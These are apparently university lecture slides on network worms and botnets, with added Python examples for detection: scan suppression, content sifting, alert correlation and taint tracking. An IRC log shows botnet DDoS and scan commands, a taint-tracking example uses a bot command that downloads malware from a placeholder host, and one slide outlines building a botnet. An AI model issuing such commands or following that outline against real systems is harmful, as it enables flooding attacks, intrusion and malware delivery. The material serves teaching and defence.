Network Worms and Bots
Outline
Worms
- Worm examples and propagation methods
- Detection methods
  - Traffic patterns: EarlyBird
  - Vulnerabilities: Generic Exploit Blocking
- Disabling worms
  - Generate signatures for network- or host-based filters
Bots
- Structure and use of bots
- Recognizing bot propagation
- Recognizing bot operation
  - Network-based methods
  - Host-based methods
Worm
A worm is self-replicating software designed to spread through the network
- Typically exploits security flaws in widely used services
- Can cause enormous damage
  - Launch DDoS attacks, install bot networks
  - Access sensitive information
  - Cause confusion by corrupting the sensitive information
Worm vs Virus vs Trojan horse
- A virus is code embedded in a file or program
- Viruses and Trojan horses rely on human intervention to spread
- Worms are self-contained and may spread autonomously
Cost of worm attacks
Morris worm, 1988
- Infected approximately 6,000 machines, about 10% of the computers connected to the Internet at the time
- Cost ~ $10 million in downtime and cleanup
Code Red worm, July 2001
- Conceptual descendant of the Morris worm: exploits a buffer overflow in a widely deployed network service
- Infected more than 500,000 servers
  - Programmed to go into infinite sleep mode on July 28
- Caused ~ $2.6 billion in damages
Love Bug worm: $8.75 billion
Statistics: Computer Economics Inc., Carlsbad, California
Internet Worm (first major attack)
Released November 1988
- Program spread through Digital and Sun workstations
- Exploited Unix security vulnerabilities
  - VAX computers and SUN-3 workstations running versions 4.2 and 4.3 of the Berkeley UNIX code
Consequences
- No immediate damage from the program itself
- Replication and threat of damage
  - Load on the network and on the systems used in the attack
  - Many systems shut down to prevent further attack
Some historical worms of note

Worm      Date   Distinction
Morris    11/88  Used multiple vulnerabilities; propagated to "nearby" systems
ADM       5/98   Random scanning of the IP address space
Ramen     1/01   Exploited three vulnerabilities
Lion      3/01   Stealthy, rootkit worm
Cheese    6/01   Vigilante worm that secured vulnerable systems
Code Red  7/01   First significant Windows worm; completely memory resident
Walk      8/01   Recompiled source code locally
Nimda     9/01   Windows worm: client-to-server, client-to-client, server-to-server, ...
Scalper   6/02   Released 11 days after announcement of the vulnerability; peer-to-peer network of compromised systems
Slammer   1/03   Used a single UDP packet for explosive growth

Source: Kienzle and Elder
Increasing propagation speed
Code Red, July 2001
- Affects Microsoft Index Server 2.0 on Windows NT 4.0 and the Indexing Service on Windows 2000, reached through the IIS 4.0 and 5.0 web servers
- Exploits a known buffer overflow in Idq.dll, the indexing service's ISAPI extension
- Vulnerable population (360,000 servers) infected in 14 hours
SQL Slammer, January 2003
- Affects Microsoft SQL Server 2000
- Exploits a known buffer overflow vulnerability
  - SQL Server Resolution Service vulnerability reported June 2002
  - Patch released July 2002, Microsoft bulletin MS02-039
- Vulnerable population infected in less than 10 minutes
Code Red
Initial version released July 13, 2001
- Sends its code as an HTTP request
- The HTTP request exploits the buffer overflow
- Malicious code is not stored in a file: it is placed in memory and then run
When executed:
- The worm checks for the file C:\Notworm; if the file exists, the worm thread goes into an infinite sleep state
- Creates new threads; if the date is before the 20th of the month, the next 99 threads attempt to exploit more computers by targeting random IP addresses
Code Red of July 13 and July 19
Initial release of July 13:
- 1st through 20th of each month: spread, via random scan of the 32-bit IP address space
- 20th through end of each month: attack, a flooding attack against 198.137.240.91 (www.whitehouse.gov)
- Failure to seed the random number generator: every instance probed the same sequence of addresses, so the infected population grew only linearly
Revision released July 19, 2001:
- The White House responded to the threat of the flooding attack by changing the address of www.whitehouse.gov, which causes Code Red to die for dates >= the 20th of the month
- But this time the random number generator was correctly seeded, and the worm spread far faster
Slides: Vern Paxson
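To see why the unseeded generator matters, here is an added simulation (example code written for this page, not Code Red's code and not from Paxson's slides). It uses a toy 16-bit address space with a 5% vulnerable fraction and a fixed number of probes per round, all constructed parameters, and runs two variants: one where every instance starts its generator from the same constant (the July 13 bug) and one where each instance seeds independently (the July 19 revision).

```python
import random

# Toy parameters, constructed for this example (Code Red scanned the full
# 32-bit space; the dynamics are the same at small scale).
ADDRESS_SPACE = 1 << 16
VULNERABLE_FRACTION = 0.05
SCANS_PER_ROUND = 20
ROUNDS = 14
FIXED_SEED = 0x5EED          # the constant every July 13 instance started from


def build_vulnerable(seed=1):
    """Deterministically pick the vulnerable hosts in the toy address space."""
    rng = random.Random(seed)
    return {addr for addr in range(ADDRESS_SPACE) if rng.random() < VULNERABLE_FRACTION}


def simulate(vulnerable, seeded, rounds=ROUNDS, seed=1):
    """Run a random-scanning worm and return (infected count per round,
    number of distinct addresses probed).

    seeded=False models the July 13 Code Red: every copy initialises its
    generator identically, so every copy walks the same address sequence
    from its beginning and the population only re-probes what patient zero
    already tried.  seeded=True models the July 19 revision: each copy scans
    its own independent sequence.
    """
    infected = {min(vulnerable)}          # patient zero
    generators = {}                       # one PRNG per infected instance
    probed = set()
    history = []
    for _ in range(rounds):
        newly_infected = set()
        for host in list(infected):
            if host not in generators:
                per_host_seed = seed * 1_000_003 + host if seeded else FIXED_SEED
                generators[host] = random.Random(per_host_seed)
            rng = generators[host]
            for _ in range(SCANS_PER_ROUND):
                target = rng.randrange(ADDRESS_SPACE)
                probed.add(target)
                if target in vulnerable and target not in infected:
                    newly_infected.add(target)
        infected |= newly_infected        # new copies start scanning next round
        history.append(len(infected))
    return history, len(probed)


def compare(seed=1):
    """Run both variants against the same vulnerable population."""
    vulnerable = build_vulnerable(seed)
    return {
        "unseeded": simulate(vulnerable, seeded=False, seed=seed),
        "seeded": simulate(vulnerable, seeded=True, seed=seed),
    }


if __name__ == "__main__":
    for name, (history, probed) in compare().items():
        print(f"{name:8s} infected per round: {history}  distinct addresses probed: {probed}")
```

In the unseeded run the number of distinct addresses ever probed is bounded by probes-per-round times rounds no matter how many copies exist, which is the linear growth on the slide; the seeded run's probed set and infected count grow with the population.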
Code Red 2
Released August 4, 2001
- Comment in code: "Code Red 2." But in fact a completely different code base
- Payload: a root backdoor, resilient to reboots
- Bug: crashes NT, only works on Windows 2000
- Localized scanning: prefers nearby addresses
- Kills Code Red 1
- Safety valve: programmed to die Oct 1, 2001
Slides: Vern Paxson
Striving for Greater Virulence: Nimda
Released September 18, 2001
Multi-mode spreading:
- attack IIS servers via infected clients
- email itself to the address book as a virus
- copy itself across open network shares
- modify Web pages on infected servers with a client exploit
- scan for Code Red II backdoors (!)
  - worms form an ecosystem!
Leaped across firewalls.
Slides: Vern Paxson
Figure (slides: Vern Paxson): timeline of the Code Red 1, Code Red 2 and Nimda populations. Code Red 2 kills off Code Red 1; CR 1 returns thanks to bad clocks; Nimda enters the ecosystem; Code Red 2 settles into a weekly pattern; Code Red 2 dies off as programmed.
How do worms propagate?
Scanning worms
- Worm chooses a "random" address
Coordinated scanning
- Different worm instances scan different addresses
Flash worms
- Assemble a tree of vulnerable hosts in advance, propagate along the tree
  - Not observed in the wild, yet
  - Potential for 10^6 hosts in < 2 sec! [Staniford]
Meta-server worm
- Ask a server for hosts to infect (e.g., Google for "powered by phpbb")
Topological worm
- Use information from infected hosts (web server logs, email address books, config files, SSH "known hosts")
Contagion worm
- Propagate parasitically along with normally initiated communication
Worm Detection and Defense
Detect via honeyfarms: collections of "honeypots"
- Any outbound connection from the honeyfarm = worm (at least, that's the theory)
- Distill a signature from inbound/outbound traffic
- If the honeypot covers N addresses, expect detection when the worm has infected 1/N of the population
Thwart via scan suppressors: network elements that block traffic from hosts that make failed connection attempts to too many other hosts
Hand-written signatures are slow:
- 5 minutes to several weeks to write a signature
- Several hours or more for testing
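A scan suppressor of the kind just described, as an added example (written for this page, not any vendor's implementation): it counts, per source, failed connection attempts to distinct destinations within a sliding time window and blocks the source once that count reaches a limit. The connection log, the thresholds and the 10.0.0.0/8 addresses are constructed for illustration.

```python
from collections import defaultdict, deque


class ScanSuppressor:
    """Block a source once its failed connection attempts within a sliding
    window reach too many distinct destinations."""

    def __init__(self, distinct_limit=5, window_seconds=60):
        self.distinct_limit = distinct_limit
        self.window_seconds = window_seconds
        self.failures = defaultdict(deque)    # src -> deque of (time, dst) failures
        self.blocked = {}                     # src -> time it was blocked

    def allowed(self, src):
        return src not in self.blocked

    def observe(self, time, src, dst, succeeded):
        """Account for one connection attempt. Returns False if the source was
        already blocked (the attempt is dropped), True otherwise."""
        if not self.allowed(src):
            return False
        if succeeded:
            return True                       # successful connections never count against a host
        recent = self.failures[src]
        recent.append((time, dst))
        while recent and time - recent[0][0] > self.window_seconds:
            recent.popleft()                  # forget failures outside the window
        if len({d for _, d in recent}) >= self.distinct_limit:
            self.blocked[src] = time
        return True


# Constructed connection log: "<time> <src> <dst> <outcome>", outcome "ok" for a
# completed handshake, "fail" for RST/timeout. 10.0.0.5 sweeps a /24; 10.0.0.7
# is a normal client that retries one dead host; 10.0.0.9 fails only rarely.
LOG = """\
0 10.0.0.5 10.0.1.1 fail
0 10.0.0.9 10.0.3.1 fail
1 10.0.0.5 10.0.1.2 fail
2 10.0.0.5 10.0.1.3 fail
3 10.0.0.5 10.0.1.4 fail
3 10.0.0.7 10.0.1.4 ok
4 10.0.0.7 10.0.2.9 fail
4 10.0.0.5 10.0.1.5 fail
5 10.0.0.5 10.0.1.6 fail
6 10.0.0.7 10.0.2.9 fail
7 10.0.0.7 10.0.1.1 ok
100 10.0.0.9 10.0.3.2 fail
200 10.0.0.9 10.0.3.3 fail
300 10.0.0.9 10.0.3.4 fail
400 10.0.0.9 10.0.3.5 fail
"""


def replay(log=LOG, **kwargs):
    """Feed the log through a suppressor; return (blocked sources, dropped attempts)."""
    suppressor = ScanSuppressor(**kwargs)
    dropped = []
    for line in log.splitlines():
        time, src, dst, outcome = line.split()
        if not suppressor.observe(int(time), src, dst, outcome == "ok"):
            dropped.append((int(time), src, dst))
    return suppressor.blocked, dropped


if __name__ == "__main__":
    blocked, dropped = replay()
    print("blocked:", blocked)
    print("dropped:", dropped)
```

Counting distinct destinations rather than raw failures is what keeps the retrying client 10.0.0.7 unblocked, and the window is what keeps the slow 10.0.0.9 unblocked; widen the window and it is caught too. A real deployment also has to decide what to do about a scanner that succeeds often enough to stay under the limit, which this simple counter does not address.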
Signature inference
Monitor the network and look for strings common to traffic with worm-like behavior
Signatures can then be used for content filtering
Slide: S Savage
Content sifting
Assume there exists some (relatively) unique invariant bitstring W across all instances of a particular worm (true today, not tomorrow...)
Two consequences
- Content Prevalence: W will be more common in traffic than other bitstrings of the same length
- Address Dispersion: the set of packets containing W will address a disproportionate number of distinct sources and destinations
Content sifting: find W's with high content prevalence and high address dispersion and drop that traffic
Slide: S Savage
The basic algorithm (Stefan Savage, UCSD)
A detector sits in the network between hosts A, B, C, D, E and cnn.com. It keeps a Prevalence Table (how many packets carried each content string) and an Address Dispersion Table (the distinct sources and destinations of the packets carrying each string). Walking through four packets:

1. A -> B carries string 1.
   Prevalence: string 1 = 1
   Dispersion: string 1: sources 1 (A), destinations 1 (B)
2. C -> A carries a second, unrelated string 2.
   Prevalence: string 1 = 1, string 2 = 1
   Dispersion: string 1: sources 1 (A), destinations 1 (B); string 2: sources 1 (C), destinations 1 (A)
3. B -> D carries string 1 again.
   Prevalence: string 1 = 2, string 2 = 1
   Dispersion: string 1: sources 2 (A,B), destinations 2 (B,D); string 2: sources 1 (C), destinations 1 (A)
4. D -> E carries string 1.
   Prevalence: string 1 = 3, string 2 = 1
   Dispersion: string 1: sources 3 (A,B,D), destinations 3 (B,D,E); string 2: sources 1 (C), destinations 1 (A)

String 1 is now both prevalent and widely dispersed across sources and destinations, the profile of a worm's invariant content; string 2 is not.
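The content sifting walk-through above, as an added example in code (written for this page; it is not EarlyBird's implementation). It keeps the same two tables, keyed by a fingerprint of every 16-byte substring of each packet, and reports substrings that pass both a prevalence threshold and a source-and-destination dispersion threshold. The invariant W, the cnn.com page, the client request and the thresholds are all constructed; the worm packets wrap W in a varying header so that only the invariant part is shared.

```python
import hashlib
from collections import defaultdict


class ContentSifter:
    """Per content fingerprint: how often it was seen (prevalence) and how many
    distinct sources and destinations carried it (address dispersion)."""

    def __init__(self, window=16, prevalence_threshold=3, dispersion_threshold=3):
        self.window = window
        self.prevalence_threshold = prevalence_threshold
        self.dispersion_threshold = dispersion_threshold
        self.prevalence = defaultdict(int)
        self.sources = defaultdict(set)
        self.destinations = defaultdict(set)
        self.sample = {}                     # fingerprint -> the bytes it covers

    def fingerprints(self, payload):
        """Fingerprint every window-length substring of the payload.  EarlyBird
        uses Rabin fingerprints plus value sampling so that only a fraction of
        substrings is tracked; this example tracks all of them for clarity."""
        for i in range(len(payload) - self.window + 1):
            chunk = payload[i:i + self.window]
            yield hashlib.blake2b(chunk, digest_size=8).digest(), chunk

    def observe(self, src, dst, payload):
        # dict() collapses repeats so a substring counts once per packet
        for fp, chunk in dict(self.fingerprints(payload)).items():
            self.prevalence[fp] += 1
            self.sources[fp].add(src)
            self.destinations[fp].add(dst)
            self.sample.setdefault(fp, chunk)

    def is_suspicious(self, fp):
        return (self.prevalence[fp] >= self.prevalence_threshold
                and len(self.sources[fp]) >= self.dispersion_threshold
                and len(self.destinations[fp]) >= self.dispersion_threshold)

    def signatures(self):
        """Content worth filtering: high prevalence AND high dispersion."""
        return sorted(self.sample[fp] for fp in self.prevalence if self.is_suspicious(fp))


# Constructed traffic.  W is the worm's invariant bitstring; each worm packet
# wraps it in a per-instance variable header, the way differing request lines
# or a polymorphic wrapper would.
W = b"\x90\x90\x90\x90<<WORM-INVARIANT-SHELLCODE>>"
CNN_PAGE = b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n<html><title>CNN</title></html>"
CLIENT_REQUEST = b"GET / HTTP/1.1\r\nHost: cnn.com\r\n\r\n"


def worm_packet(nonce):
    return b"POST /probe/" + nonce + b" HTTP/1.0\r\n\r\n" + W + b"\r\n"


def build_traffic(include_worm=True):
    traffic = []
    for client in ("A", "B", "D", "E"):
        traffic.append((client, "cnn.com", CLIENT_REQUEST))   # popular: many sources, one destination
        traffic.append(("cnn.com", client, CNN_PAGE))         # popular: one source, many destinations
    if include_worm:                                          # worm: many sources AND many destinations
        traffic += [("A", "B", worm_packet(b"x1")), ("B", "D", worm_packet(b"7f")),
                    ("D", "E", worm_packet(b"c3")), ("E", "C", worm_packet(b"9a"))]
    return traffic


def run_demo(include_worm=True):
    sifter = ContentSifter()
    for src, dst, payload in build_traffic(include_worm):
        sifter.observe(src, dst, payload)
    return sifter.signatures()


if __name__ == "__main__":
    for sig in run_demo():
        print("filter:", sig)
```

The cnn.com page is just as prevalent as the worm but comes from a single source, and the client request goes to a single destination, so neither passes the dispersion test; only substrings inside the worm's invariant region are reported. Overlapping substrings of W all qualify, so a deployment would merge adjacent hits into one signature before pushing it to a filter.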
Challenges
Computation
- To support a 1 Gbps line rate we have 12 µs to process each packet, at 10 Gbps 1.2 µs, at 40 Gbps ...
  - Dominated by memory references; state is expensive
- Content sifting requires looking at every byte in a packet
State
- On a fully loaded 1 Gbps link a naive implementation can easily consume 100 MB/sec for the tables
- Computation/memory duality: in a high-speed (ASIC) implementation, latency requirements may limit state to on-chip SRAM
(Stefan Savage, UCSD)
Worm summary
Worm attacks
- Many ways for worms to propagate
- Propagation speed is increasing: Code Red needed hours, Slammer minutes
- Polymorphic worms and other barriers to detection
Detect
- Traffic patterns: EarlyBird
- Watch the attack: TaintCheck and Sting
- Look at vulnerabilities: Generic Exploit Blocking
Disable
- Generate worm signatures and use them in network- or host-based filters
Botnet
Collection of compromised hosts
- Spread like worms and viruses
- Once installed, respond to remote commands
Platform for many attacks
- Spam forwarding (70% of all spam?)
- Click fraud
- Keystroke logging
- Distributed denial of service attacks
Serious problem
- Top concern of banks, online merchants
- Vint Cerf: 1/4 of hosts connected to the Internet
What are botnets used for?
Capability comparison across six bot families (agobot, DSNX, evilbot, G-SySbot, sdbot, Spybot); agobot supports every capability listed:
- create port redirect
- other proxy
- download file from web
- DNS resolution
- UDP/ping floods
- other DDoS floods
- scan/spread
- spam
- visit URL
Capabilities are exercised via remote commands.
Building a Bot Network
Step 1: the attacker launches compromise attempts against a mix of hosts (Win XP, FreeBSD, Mac OS X, Win XP); the two Win XP hosts are compromised and bot software is installed on them.
Step 2: each bot connects to the IRC server and joins the control channel:
  /connect jade.va.us.dal.net
  /join #hacker
Step 3: the channel operator issues commands to the assembled bots:
(12:59:27pm) -- A9-pcgbdv ([email protected]) has joined (#owned) Users : 1646
(12:59:27pm) (@PhaTTy) .ddos.synflood 216.209.82.62
(12:59:27pm) -- A6-bpxufrd ([email protected]) has joined (#owned) Users : 1647
(12:59:27pm) -- A9-nzmpah ([email protected]) has left IRC (Connection reset by peer)
(12:59:28pm) (@PhaTTy) .scan.enable DCOM
(12:59:28pm) -- A9-tzrkeasv ([email protected]) has joined (#owned) Users : 1650
Uses of a botnet (figure): spam service, rent-a-bot, cash-out, pump and dump, botnet rental

Underground commerce
Market in access to bots
- Botherd: collects and manages bots
- Access to proxies ("peas") is sold to spammers, often with a commercial-looking web interface
Sample rates
- Non-exclusive access to a botnet: 10¢ per machine
- Exclusive access: 25¢
- Payment via compromised account (e.g. PayPal) or cash to a dropbox
Identity theft
- Keystroke logging
- Complete identities available for $25 - $200+
  - Rates depend on the financial situation of the compromised person
  - Include all info from PC files, plus all websites of interest with passwords/account info used by the PC owner
  - At $200+, usually includes a full credit report
[Lloyd Taylor, Keynote Systems, SFBay InfraGard Board]
Sobig.a In Action
Arrives as an email attachment
- Written in C++
- Encrypted with the Telock packer to slow analysis
User opens the attachment, launching the trojan
- Downloads a file from a free Geocities account, which contains a list of URLs pointing to the second stage
- Fetches the second-stage trojan: an arbitrary executable file, could be anything; for Sobig.a, the second-stage trojan is Lala
Stage 2 - Lala
Communication
- Lala notifies a CGI script on a compromised host
- Different versions of Lala have different sites and CGI scripts, perhaps indicating tracking by the author
Installation
- Lala installs a keylogger and a password-protected Lithium remote access trojan
- Lala downloads the Stage 3 trojan: Wingate proxy (commercial software)
Cleanup
- Lala removes the Sobig.a trojan
Stage 3 - Wingate
Wingate is a general-purpose port proxy server. Listening ports on the compromised machine:
  555/TCP   RTSP Service
  608/TCP   Remote Control
  1180/TCP  SOCKS
  1181/TCP  Telnet Proxy
  1182/TCP  WWW Proxy
  1183/TCP  FTP Proxy
  1184/TCP  POP3 Proxy
  1185/TCP  SMTP Server
Final state of the compromised machine
- Complete remote control by the Lithium client with password "adm123"
- Complete logging of the user's keystrokes
- Usable for spam relay and HTTP redirects
- The Wingate Gatekeeper client can connect to 608/TCP and can log/change everything
Build Your Own Botnet
Pick a vector mechanism
- IRC channels: DCC file sends, website adverts pointing to exploit sites
- Scan & sploit: MSBlast
- Trojan: SoBig/BugBear/ActiveX exploits
Choose a payload
- Backdoors
  - Agobot, SubSeven, DeepThroat
  - Most include mechanisms for DDoS, self-spreading, download/exec of arbitrary code, password stealers
Do it
- Compromise an IRC server, or use your own zombied machines
- Configure the payload to connect to the selected server
- Load encryption keys and codes
- Release through appropriate compromised systems
- Sit back and wait, or start on your next botnet
[Lloyd Taylor, Keynote Systems, SFBay InfraGard Board]
Bot detection methods
Signature-based (most AV products)
Rule-based
- Monitor outbound network connections (e.g. ZoneAlarm, BINDER)
- Block certain ports (25, 6667, ...)
Hybrid: content-based filtering
- Match network packet contents to known command strings (keywords)
- E.g. Gaobot DDoS commands: .ddos.httpflood
Network traffic monitoring
- Wenke Lee, Phil Porras: BotHunter, ...
  - Correlate various NIDS alarms to identify the "bot infection sequence"
- GA Tech: recognize traffic patterns associated with DDNS-based rallying
- Stuart Staniford, FireEye
  - Detect port scanning to identify suspicious traffic
  - Emulate the host with taint tracking to identify the exploit
BotHunter: passive bot detection
Snort-based sensor suite for malware event detection
- inbound scan detection
- remote-to-local exploit detection
- anomaly detection system for exploits over key TCP protocols
- botnet-specific egg download banners
- victim-to-C&C communication exchanges, particularly for IRC bot protocols
Event correlator
- combines information from the sensors to recognize bots that infect and coordinate with your internal network assets
- submits "bot-detection profiles" to the Cyber-TA repository infrastructure
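An added example of the correlation idea (written for this page; not BotHunter's code, and the declaration rule is this example's own simplification of the infection-dialog model): sensor alerts are tagged with one of five event classes, each is attributed to the internal host it concerns, and a host is declared a bot only when enough of the dialog has been seen. It also folds in the keyword-based content filter from the earlier slide as the C&C sensor. The alert stream, the keyword list, the 10.0.0.0/8 internal range and the external addresses are constructed.

```python
import ipaddress
from collections import defaultdict

INTERNAL = ipaddress.ip_network("10.0.0.0/8")        # constructed: the monitored network

# Infection-dialog event classes, numbered as in BotHunter's model.  Inbound
# classes are attributed to the destination, outbound ones to the source.
E1, E2, E3, E4, E5 = "E1", "E2", "E3", "E4", "E5"
INBOUND = {E1, E2}          # E1 inbound scan, E2 remote-to-local exploit
OUTBOUND = {E3, E4, E5}     # E3 egg download, E4 C&C exchange, E5 outbound scan

# Content sensor for E4: command keywords from common IRC bot dialects (cf. the
# ".ddos.*" and ".scan.*" commands in the IRC excerpt earlier on this page).
CNC_KEYWORDS = (b".ddos.", b".scan.", b".http.execute", b".bot.")


def payload_sensor(payload):
    """Classify a captured payload as C&C traffic (E4) or nothing."""
    return E4 if any(k in payload for k in CNC_KEYWORDS) else None


class DialogCorrelator:
    def __init__(self):
        self.evidence = defaultdict(dict)                 # internal host -> {event class: count}

    def ingest(self, src, dst, event=None, payload=b""):
        """Attribute one sensor alert to the internal host it concerns."""
        if event is None:
            event = payload_sensor(payload)
        if event is None:
            return
        host = dst if event in INBOUND else src
        if ipaddress.ip_address(host) not in INTERNAL:
            return
        self.evidence[host][event] = self.evidence[host].get(event, 0) + 1

    def declare(self):
        """A host is declared a bot when the dialog is far enough along: an
        exploit (E2) followed by any later-stage event, or at least two
        distinct later-stage events (E3/E4/E5) even if the exploit was missed."""
        bots = {}
        for host, events in self.evidence.items():
            later = OUTBOUND & set(events)
            if (E2 in events and later) or len(later) >= 2:
                bots[host] = sorted(events)
        return bots


# Constructed alert stream: (src, dst, event class or None, payload).
ALERTS = [
    ("203.0.113.9", "10.0.0.12", E1, b""),                 # inbound scan
    ("203.0.113.9", "10.0.0.12", E2, b""),                 # exploit signature, e.g. DCOM RPC
    ("10.0.0.12", "198.51.100.7", E3, b""),                # egg download banner
    ("10.0.0.12", "198.51.100.20", None, b"PRIVMSG #owned :.ddos.synflood 216.209.82.62\r\n"),
    ("10.0.0.12", "10.0.0.77", E5, b""),                   # victim starts scanning
    ("203.0.113.9", "10.0.0.33", E1, b""),                 # scanned ...
    ("203.0.113.9", "10.0.0.33", E2, b""),                 # ... and attacked, but nothing followed
    ("10.0.0.40", "198.51.100.7", E3, b""),                # one download-like banner, nothing else
    ("10.0.0.55", "198.51.100.20", None, b"PRIVMSG #chat :hello everyone\r\n"),  # IRC chatter
]


def run_demo(alerts=ALERTS):
    correlator = DialogCorrelator()
    for src, dst, event, payload in alerts:
        correlator.ingest(src, dst, event, payload)
    return correlator.declare()


if __name__ == "__main__":
    print(run_demo())
```

The point of correlating rather than alerting on each sensor is visible in the stream: an inbound scan and exploit signature alone (10.0.0.33) or a lone download banner (10.0.0.40) are the kind of events a NIDS fires on all day, while the host that then downloads, talks to a channel and scans outward is the one worth paging someone about.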
Botnet network traffic patterns
Unique characteristic: "rallying"
- Bots spread like worms and trojans
- Payloads may be common backdoors
- Centralized control of the botnet is the characteristic feature
Georgia Tech idea: DNS
- Bots are installed at the network edge
- The controller's IP address may vary, so it is reached through Dynamic DNS
- Bots talk to the controller, making a DDNS lookup first
  - The pattern of DDNS lookups is easy to spot for common botnets!
David Dagon, Sanjeev Dwivedi, Robert Edmonds, Julian Grizzard, Wenke Lee, Richard Lipton, Merrick Furst; Cliff Zou (U Mass)
BotSwat
Host-based bot detection, based on the idea of remote-control commands
What does remote control look like?
  http.execute <URL> <local_path>
Invoke system calls (connect, network send and recv, create file, write file, ...) on arguments received over the network (IP to connect to, object to request, file name, ...)
BotSwat premise
- We can distinguish the behavior of bots from that of innocuous processes by detecting "remote control"
- We can approximate "remote control" as "using data received over the network in a system call argument"
Figure: agobot on Windows XP receives the command
  http.execute www.badguy.com/malware.exe C:\WIN\bad.exe
through the NIC (steps 1-2), parses it (3-4), and then issues
  connect(..., www.badguy.com, ...)          (5)
  [the connection leaves through the NIC]   (6)
  send(..., "...GET /malware.exe...", ...)   (7)
  fcreate(..., "C:\WIN\malware.exe", ...)    (8)
each with an argument that came straight from the network.
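The BotSwat premise as an added example (written for this page; BotSwat itself tracks taint at the instruction level inside a real process, this is a string-level approximation): bytes received from the network are wrapped in a Tainted string type whose common operations preserve the mark, and the monitored system calls are interposed so that any call with a tainted argument is reported as remote control. The system calls are simulated (no sockets or files are touched); the bot command is the one from the figure, and the benign download with user-typed arguments is constructed for contrast.

```python
class Tainted(str):
    """A string received over the network, or derived from one.  The string
    operations a command parser typically uses are overridden so the taint
    survives them (f-strings and .format() would strip it: a limitation of
    tracking at this level rather than per byte in the process)."""

    def __new__(cls, value, origin="network"):
        obj = super().__new__(cls, value)
        obj.origin = origin
        return obj

    def _wrap(self, value):
        return Tainted(value, self.origin) if isinstance(value, str) else value

    def __add__(self, other):
        return self._wrap(str.__add__(self, other))

    def __radd__(self, other):
        return self._wrap(str.__add__(other, self))

    def __getitem__(self, key):
        return self._wrap(str.__getitem__(self, key))

    def strip(self, *args):
        return self._wrap(str.strip(self, *args))

    def split(self, sep=None, maxsplit=-1):
        return [self._wrap(part) for part in str.split(self, sep, maxsplit)]


class SyscallMonitor:
    """Interposes on the calls BotSwat watches and records any whose
    arguments carry network taint."""

    def __init__(self):
        self.alerts = []

    def check(self, name, *args):
        tainted = [a for a in args if isinstance(a, Tainted)]
        if tainted:
            self.alerts.append((name, tainted))
        return not tainted


MONITOR = SyscallMonitor()


# Simulated system calls: they only consult the monitor and return a token.
def sys_connect(host, port):
    MONITOR.check("connect", host, port)
    return (host, port)


def sys_send(sock, data):
    MONITOR.check("send", data)
    return len(data)


def sys_fcreate(path):
    MONITOR.check("fcreate", path)
    return path


def fetch_and_save(url, local_path):
    """The same three calls whether the arguments came from a user or the network."""
    host, path = url.split("/", 1)
    sock = sys_connect(host, 80)
    sys_send(sock, "GET /" + path + " HTTP/1.0\r\n\r\n")
    sys_fcreate(local_path)


def bot_handle_command(command_line):
    """Agobot-style handler for 'http.execute <URL> <local_path>' from the channel."""
    verb, url, local_path = command_line.split()
    if verb == "http.execute":
        fetch_and_save(url, local_path)


def run_demo():
    """Return (alerts raised for the bot, alerts raised for a user-driven download)."""
    MONITOR.alerts.clear()
    bot_handle_command(Tainted("http.execute www.badguy.com/malware.exe C:\\WIN\\bad.exe",
                               origin="irc:#owned"))
    bot_alerts = list(MONITOR.alerts)
    MONITOR.alerts.clear()
    fetch_and_save("www.example.com/index.html", "C:\\Users\\me\\index.html")   # user-typed
    return bot_alerts, list(MONITOR.alerts)


if __name__ == "__main__":
    bot_alerts, benign_alerts = run_demo()
    for name, args in bot_alerts:
        print(f"remote control: {name}({', '.join(map(str, args))}) from {args[0].origin}")
    print("benign alerts:", benign_alerts)
```

Both callers execute identical code; what separates them is the provenance of the arguments, which is exactly the premise stated on the slide. The hard cases for this approach are legitimate network services that also put received data into system-call arguments (an echo server, a web proxy), which is why the real system needs more than the raw "tainted argument" rule.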